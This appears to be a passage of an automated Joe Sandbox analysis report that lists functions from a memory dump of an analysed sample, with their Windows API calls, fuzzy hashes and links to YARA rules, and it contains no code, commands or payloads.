Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: 5aefc962b780edf83cf51672feeea7be82d75cedf63076f5ce13393800ae8359
Instruction ID: d87302ac3fb811a731e283ab36ab9d71180ce13381e4502723420540ac3e8e2b
Opcode Fuzzy Hash: 5aefc962b780edf83cf51672feeea7be82d75cedf63076f5ce13393800ae8359
Instruction Fuzzy Hash: BD21B1345487419FC310EF29D98986EB7E4EF95364F104A29F4A9C72E2D731DA86CB82

Function 001DDCBE Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 001DF0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,001DDCD3,?,?,?,001DEAC6,00000000,000000EF,00000119,?,?), ref: 001DF0CB
Part of subcall function 001DF0BC: lstrcpyW.KERNEL32(00000000,?,?,001DDCD3,?,?,?,001DEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 001DF0F1
Part of subcall function 001DF0BC: lstrcmpiW.KERNEL32(00000000,?,001DDCD3,?,?,?,001DEAC6,00000000,000000EF,00000119,?,?), ref: 001DF122

lstrlenW.KERNEL32(?,00000002,?,?,?,?,001DEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 001DDCEC
lstrcpyW.KERNEL32(00000000,?,?,001DEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 001DDD12
lstrcmpiW.KERNEL32(00000002,cdecl,?,001DEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 001DDD46

Strings

cdecl, xrefs: 001DDD3D

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: cf21025d846cac3fd395df1cd2ad1fb8a88e98f907290944a7a81e0539173bc5
Instruction ID: 744f905cdfe7984bddf57cafa8d7a7ba0430aabcc8f00fa6df45aaf54530a539
Opcode Fuzzy Hash: cf21025d846cac3fd395df1cd2ad1fb8a88e98f907290944a7a81e0539173bc5
Instruction Fuzzy Hash: 0311813A200305EBCF25AF74E84597A77AAFF46350B40406BF806CB3A1EB719951D791

Function 001B50E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 001B5101

Part of subcall function 001A571C: __FF_MSGBANNER.LIBCMT ref: 001A5733
Part of subcall function 001A571C: __NMSG_WRITE.LIBCMT ref: 001A573A
Part of subcall function 001A571C: RtlAllocateHeap.NTDLL(01120000,00000000,00000001,00000000,?,?,?,001A0DD3,?), ref: 001A575F

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 470059fd6e2e9616d6f7a6c0ea24e62f1d9ca56e162825128a8850e85cec78b3
Instruction ID: f4720b31a1dc9684cfb9f3b0aec3454a745a5bb2a6e0f8ad3e31515ec86c023c
Opcode Fuzzy Hash: 470059fd6e2e9616d6f7a6c0ea24e62f1d9ca56e162825128a8850e85cec78b3
Instruction Fuzzy Hash: 5411E576904B11AFCF357FB8FC4979E379AAF263A1F244529FA049A152DF30894187A0

Function 001844A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 001844CF

Part of subcall function 0018407C: _memset.LIBCMT ref: 001840FC
Part of subcall function 0018407C: _wcscpy.LIBCMT ref: 00184150
Part of subcall function 0018407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00184160

KillTimer.USER32(?,00000001,?,?), ref: 00184524
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00184533
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 001BD4B9

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: 5b6afa30a852dcd822c31d4f064be27dce1e83091aff4d171d328ab576de5b3f
Instruction ID: f22bd4396b75b31c45c7e411ecfba87b4d3c31dbeb255c8fbac762095d909166
Opcode Fuzzy Hash: 5b6afa30a852dcd822c31d4f064be27dce1e83091aff4d171d328ab576de5b3f
Instruction Fuzzy Hash: 5C2107B45047949FE736DB24E849BEBBBECAF02304F04009EE79E56142D7742A84CB42

Function 001F6369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00185A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,001E7896,?,?,00000000), ref: 00185A2C
Part of subcall function 00185A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,001E7896,?,?,00000000,?,?), ref: 00185A50

gethostbyname.WSOCK32(?,?,?), ref: 001F6399
WSAGetLastError.WSOCK32(00000000), ref: 001F63A4
_memmove.LIBCMT ref: 001F63D1
inet_ntoa.WSOCK32(?), ref: 001F63DC

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: ffeab38af2e23511f5f032c263247b0b7c9a2fb02b9848feed12b2e119070563
Instruction ID: 6ae412841ff334fdeaf7ae70251c57e16db5382bf187087d0f50ad3fd9d6aa90
Opcode Fuzzy Hash: ffeab38af2e23511f5f032c263247b0b7c9a2fb02b9848feed12b2e119070563
Instruction Fuzzy Hash: 48112E35900109AFCB04FBA4DE86CFEB7B9EF29314B144165F506A72A2DB31AF14DB61

Function 001D8B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 001D8B61
SendMessageW.USER32(?,000000C9,?,00000000), ref: 001D8B73
SendMessageW.USER32(?,000000C9,?,00000000), ref: 001D8B89
SendMessageW.USER32(?,000000C9,?,00000000), ref: 001D8BA4

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 12de1de81909ccae8ef746ecbe51ef562fefc20b2b10c424697ce5e379698fcc
Instruction ID: 173add6305768dc83e132568a830b4ff9d41c5c6c64700457793089d958d630d
Opcode Fuzzy Hash: 12de1de81909ccae8ef746ecbe51ef562fefc20b2b10c424697ce5e379698fcc
Instruction Fuzzy Hash: D5113A79900218BFDB10DBA5C884E9DBB78EB48710F204096E900B7250DB716E11DB94

Function 00181290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 00182612: GetWindowLongW.USER32(?,000000EB), ref: 00182623

DefDlgProcW.USER32(?,00000020,?), ref: 001812D8
GetClientRect.USER32(?,?), ref: 001BB5FB
GetCursorPos.USER32(?), ref: 001BB605
ScreenToClient.USER32(?,?), ref: 001BB610

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: ddeaef42573e77a294aa9a6d9c160da0a7596f646ce40f0c554f521494c3c86c
Instruction ID: 93b3e77d78683c6eb24fa7d668aeb7993f422f4c9e884bfb940755f53be8fc39
Opcode Fuzzy Hash: ddeaef42573e77a294aa9a6d9c160da0a7596f646ce40f0c554f521494c3c86c
Instruction Fuzzy Hash: A0115836900119BBCB10EF98E9899EE7BBDEB05300F600456F911E3142C730BA528FA5

Function 001E1142 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,001DFCED,?,001E0D40,?,00008000), ref: 001E115F
Sleep.KERNEL32(00000000,?,?,?,?,?,?,001DFCED,?,001E0D40,?,00008000), ref: 001E1184
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,001DFCED,?,001E0D40,?,00008000), ref: 001E118E
Sleep.KERNEL32(?,?,?,?,?,?,?,001DFCED,?,001E0D40,?,00008000), ref: 001E11C1

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: d37eac3d6bc947b11614dbbf4f9e073d844560997c4f29b3dc8ef13ae695ae03
Instruction ID: 3a519930800b2624c6af71a1e6cf3a9c776e5e294f46621e4916a311bfa2feb7
Opcode Fuzzy Hash: d37eac3d6bc947b11614dbbf4f9e073d844560997c4f29b3dc8ef13ae695ae03
Instruction Fuzzy Hash: 59113C31D00A5DE7CF189FA6E948AEEFB78FF0A751F014055EA45B2241CB709590CBD5

Function 001DD831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 001DD84D
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 001DD864
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 001DD879
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 001DD897

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: 7a02d0f0303319ad4a176879c9dfc56e70f485fd6d07db9b7ce558e68a24f050
Instruction ID: d3d9d18cacaeab11112b71b5cf241ec63bf1b11bff7e37fed7e276e2c157f2a1
Opcode Fuzzy Hash: 7a02d0f0303319ad4a176879c9dfc56e70f485fd6d07db9b7ce558e68a24f050
Instruction Fuzzy Hash: 72118BB1641304EBE3218F50FD4CF93BBBCEB00B00F10856AEA16C6641D7B0E908ABA1

Function 001B6FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 001B6FDB

Part of subcall function 001B76C2: __fltout2.LIBCMT ref: 001B76EB

__cftog_l.LIBCMT ref: 001B7001
__cftoe_l.LIBCMT ref: 001B7033

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: 26d0c55c30554bbb3c64b0e7e16f9c333c5e578c6a13c3ac388885c97597f126
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: E9014E7244814EBBCF166E84CC45CEE3F62BB6D350F598416FA18580B1D336C9B1AB81

Function 0020B2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0020B2E4
ScreenToClient.USER32(?,?), ref: 0020B2FC
ScreenToClient.USER32(?,?), ref: 0020B320
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0020B33B

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: eac0af2291b5e14c855f488ec6cc1af9d6510c66074f1d2a3e2acb487f0e6e58
Instruction ID: d16b7999915d00e59298856c005aefcb3b0d9d12467b2d7c1dc7570ccb5dc8ec
Opcode Fuzzy Hash: eac0af2291b5e14c855f488ec6cc1af9d6510c66074f1d2a3e2acb487f0e6e58
Instruction Fuzzy Hash: 64114775D00209EFDB51CF99D5449EEBBF9FF08310F104166E914E3621D735AA658F50

Function 001E6BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 001E6BE6

Part of subcall function 001E76C4: _memset.LIBCMT ref: 001E76F9

_memmove.LIBCMT ref: 001E6C09
_memset.LIBCMT ref: 001E6C16
LeaveCriticalSection.KERNEL32(?), ref: 001E6C26

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: 74b836cb856d81a02b05a9115ab315405f8f1d2f2b48ba98df058f7e9b77f1a4
Instruction ID: 64c604074c6d280f008fe9782a0108e7af2deb2cb567ec0eaf2a2496d61b0f6f
Opcode Fuzzy Hash: 74b836cb856d81a02b05a9115ab315405f8f1d2f2b48ba98df058f7e9b77f1a4
Instruction Fuzzy Hash: ECF0547A100200ABCF416F95EC85A4ABB29EF59320F048061FE085E267C731E811DBB4

Function 00182218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00182231
SetTextColor.GDI32(?,000000FF), ref: 0018223B
SetBkMode.GDI32(?,00000001), ref: 00182250
GetStockObject.GDI32(00000005), ref: 00182258
GetWindowDC.USER32(?,00000000), ref: 001BBE83
GetPixel.GDI32(00000000,00000000,00000000), ref: 001BBE90
GetPixel.GDI32(00000000,?,00000000), ref: 001BBEA9
GetPixel.GDI32(00000000,00000000,?), ref: 001BBEC2
GetPixel.GDI32(00000000,?,?), ref: 001BBEE2
ReleaseDC.USER32(?,00000000), ref: 001BBEED

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: b1e4e90e1e5134da6c5288100fb3997302adb763af7903c8e32e83bfe59ae057
Instruction ID: 778d779ea447c73412a9b4378c51913e211299df0eb88c71ac0dbcc865616b3c
Opcode Fuzzy Hash: b1e4e90e1e5134da6c5288100fb3997302adb763af7903c8e32e83bfe59ae057
Instruction Fuzzy Hash: 38E03932144244AADFA15F64FD4D7D87F11EB05332F008366FA69484E287B14990DF12

Function 001D8712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 001D871B
OpenThreadToken.ADVAPI32(00000000,?,?,?,001D82E6), ref: 001D8722
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,001D82E6), ref: 001D872F
OpenProcessToken.ADVAPI32(00000000,?,?,?,001D82E6), ref: 001D8736

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 6b4f4a5fa2187ea36173c5ea9d02139b1b06084c48c47701903691e1dbf8c5ac
Instruction ID: 66a35fb442f32923844f1decf6fc02d0d08500eda273ca55317d3beadd867430
Opcode Fuzzy Hash: 6b4f4a5fa2187ea36173c5ea9d02139b1b06084c48c47701903691e1dbf8c5ac
Instruction Fuzzy Hash: 0AE086366553119BD7B05FF47E0CB563BACEF50791F148828B645C9041DB348441C750

Function 00186240 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 317COMMON

Download Yara Rule

Strings

%!, xrefs: 0018624E

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID:
String ID: %!
API String ID: 0-1084970021
Opcode ID: 33bbf4c998b86155d6e199995a961860c208c8eecea2fd40859754b94a23ae7f
Instruction ID: f54733dffa0e3305af33d8490e393f892bdd6193677f0faa3732b2b80aac46e8
Opcode Fuzzy Hash: 33bbf4c998b86155d6e199995a961860c208c8eecea2fd40859754b94a23ae7f
Instruction Fuzzy Hash: BAB18B719001099ACF29FF94C8859FEBBB9FF54310F604126E916A7291EB349F82CF91

Function 001FAEA2 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 313COMMON

Download Yara Rule

APIs

__itow_s.LIBCMT ref: 001FAFAE

Strings

xb$, xrefs: 001FB010
xb$, xrefs: 001FAFE4

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: __itow_s
String ID: xb$$xb$
API String ID: 3653519197-770476754
Opcode ID: 9d34ffeb5d0d939c65c4f38abe913679b425c421e9ced8d773e8d075441ca60c
Instruction ID: d6abcc494abe0118c74eac39bc71b09047a858cf6eb5487f8de808290a2ef114
Opcode Fuzzy Hash: 9d34ffeb5d0d939c65c4f38abe913679b425c421e9ced8d773e8d075441ca60c
Instruction Fuzzy Hash: 8BB19274A04209EFCB14EF54D890EBEBBB9FF59300F148059FA459B291EB70EA41CB60

Function 001EAFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 0019FC86: _wcscpy.LIBCMT ref: 0019FCA9

Part of subcall function 00189837: __itow.LIBCMT ref: 00189862
Part of subcall function 00189837: __swprintf.LIBCMT ref: 001898AC

__wcsnicmp.LIBCMT ref: 001EB02D
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 001EB0F6

Strings

LPT, xrefs: 001EB027

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: 08a6424784dd4af32939d08a4b2e8a8cdfa8adeebf902c7ea55cd50393e0a428
Instruction ID: 02d5cc45912d434d928698b926d49182c226d4c46493ec718faced45cc6c33ae
Opcode Fuzzy Hash: 08a6424784dd4af32939d08a4b2e8a8cdfa8adeebf902c7ea55cd50393e0a428
Instruction Fuzzy Hash: 9261A175A04619AFCB18EF95D891EBFB7B4EF19310F154069F816AB391D730AE80CB50

Function 00192957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00192968
GlobalMemoryStatusEx.KERNEL32(?), ref: 00192981

Strings

@, xrefs: 00192975

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

